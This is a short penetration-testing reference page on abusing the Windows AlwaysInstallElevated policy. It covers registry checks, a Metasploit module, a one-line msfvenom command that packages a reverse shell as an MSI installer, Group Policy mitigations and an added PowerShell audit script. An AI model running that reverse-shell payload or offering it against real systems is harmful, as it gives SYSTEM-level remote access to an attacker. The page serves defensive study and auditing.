Always Install Elevated

Always Install Elevated is a registry / GPO setting that allows non-privileged accounts to install Windows Installer package (MSI) files with SYSTEM permissions. It is usually enabled to reduce Helpdesk workload when users need software installed.

Command to query registry keys:

# A value of 0x1 means AlwaysInstallElevated is enabled. The setting only takes effect when both keys below are set to 0x1.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

WinPEAS can also be used to show this setting as being enabled.

Exploitation

Metasploit

Metasploit can be used to abuse this privilege.

use exploit/windows/local/always_install_elevated

Manual - msfvenom

msfvenom can be used to create a reverse shell disguised as an MSI file. When the file is executed / installed, a reverse shell runs as SYSTEM.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f msi -o Application.msi

Manual install of the MSI file:

Which returns a SYSTEM shell as shown below.

Mitigations

Ensure that the "Always install with elevated privileges" policy is set to Disabled in both of the following Group Policy locations:

  • Computer Configuration\Administrative Templates\Windows Components\Windows Installer

  • User Configuration\Administrative Templates\Windows Components\Windows Installer
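
To verify the mitigation on a host, the following PowerShell audit is an added example (not from the original page). It goes beyond the two reg query commands above by checking every loaded user hive under HKEY_USERS rather than only the current user. The function name Get-AlwaysInstallElevatedStatus and the output fields are illustrative assumptions.

```powershell
# Added example: audit AlwaysInstallElevated for the machine and all loaded user hives.
# Function name and output fields are illustrative, not part of the original page.
function Get-AlwaysInstallElevatedStatus {
    $sub = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

    # Returns the DWORD value, or $null when the key/value is absent (policy not configured).
    $read = {
        param($Path)
        (Get-ItemProperty -Path $Path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }

    $machine = & $read "Registry::HKEY_LOCAL_MACHINE\$sub"

    # HKCU only reflects the current user; HKEY_USERS holds every loaded profile.
    Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notlike '*_Classes' } |
        ForEach-Object {
            $user = & $read "Registry::HKEY_USERS\$($_.PSChildName)\$sub"
            [pscustomobject]@{
                Sid          = $_.PSChildName
                MachineValue = $machine
                UserValue    = $user
                # Elevated installs only apply when BOTH values are 1.
                Vulnerable   = ($machine -eq 1 -and $user -eq 1)
            }
        }
}

$findings = Get-AlwaysInstallElevatedStatus
$findings | Format-Table -AutoSize

if ($findings.Vulnerable -contains $true) {
    Write-Warning 'AlwaysInstallElevated is effective for at least one user. Set the policy to Disabled in both GPO locations.'
}
```

Profiles that are not currently loaded do not appear under HKEY_USERS, so run the check while the relevant users are logged on or rely on the GPO report for full coverage.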
